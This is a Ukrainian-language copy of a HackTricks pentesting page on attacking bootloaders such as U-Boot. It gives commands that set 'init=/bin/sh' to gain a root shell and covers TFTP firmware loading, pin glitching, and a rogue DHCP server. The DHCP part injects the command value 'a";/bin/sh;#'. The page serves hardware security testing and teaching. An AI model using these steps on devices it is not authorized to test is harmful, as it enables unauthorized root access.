mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
6.6 KiB
6.6 KiB
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити вашу компанію в рекламі HackTricks або завантажити HackTricks у PDF Перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFTs
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакінг-прийомами, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.
Рекомендовані кроки для модифікації конфігурацій запуску пристрою та завантажувачів, таких як U-boot:
- Доступ до інтерпретатора завантажувача:
- Під час завантаження натисніть "0", пробіл або інші визначені "магічні коди", щоб отримати доступ до інтерпретатора завантажувача.
- Змінити аргументи завантаження:
- Виконайте наступні команди, щоб додати '
init=/bin/sh
' до аргументів завантаження, що дозволить виконання команди оболонки: %%% #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot %%%
- Налаштувати сервер TFTP:
- Налаштуйте сервер TFTP для завантаження зображень через локальну мережу: %%% #setenv ipaddr 192.168.2.2 #локальна IP-адреса пристрою #setenv serverip 192.168.2.1 #IP-адреса сервера TFTP #saveenv #reset #ping 192.168.2.1 #перевірте доступ до мережі #tftp ${loadaddr} uImage-3.6.35 #loadaddr бере адресу для завантаження файлу та ім'я файлу зображення на сервері TFTP %%%
- Використовуйте
ubootwrite.py
:
- Використовуйте
ubootwrite.py
для запису зображення U-boot та відправлення модифікованої прошивки для отримання root-доступу.
- Перевірте відладкові функції:
- Перевірте, чи увімкнені відладкові функції, такі як розширене ведення журналу, завантаження довільних ядер або завантаження з ненадійних джерел.
- Обережне втручання у апаратне забезпечення:
- Будьте обережні при підключенні одного контакту до землі та взаємодії з чіпами SPI або NAND Flash під час послідовності завантаження пристрою, зокрема до розпакування ядра. Перед замиканням контактів перевірте технічні характеристики чіпа NAND Flash.
- Налаштувати підроблений сервер DHCP:
- Налаштуйте підроблений сервер DHCP зі зловмисними параметрами для пристрою, які він прийматиме під час PXE-завантаження. Використовуйте інструменти, такі як допоміжний сервер DHCP Metasploit (MSF). Змініть параметр 'FILENAME' на команди введення команд впровадження, такі як
'a";/bin/sh;#'
для перевірки валідації введення для процедур запуску пристрою.
Примітка: Кроки, що передбачають фізичну взаємодію з контактами пристрою (*позначені зірочкою), слід підходити з надзвичайною обережністю, щоб уникнути пошкодження пристрою.
References
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити вашу компанію в рекламі HackTricks або завантажити HackTricks у PDF Перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFTs
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакінг-прийомами, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.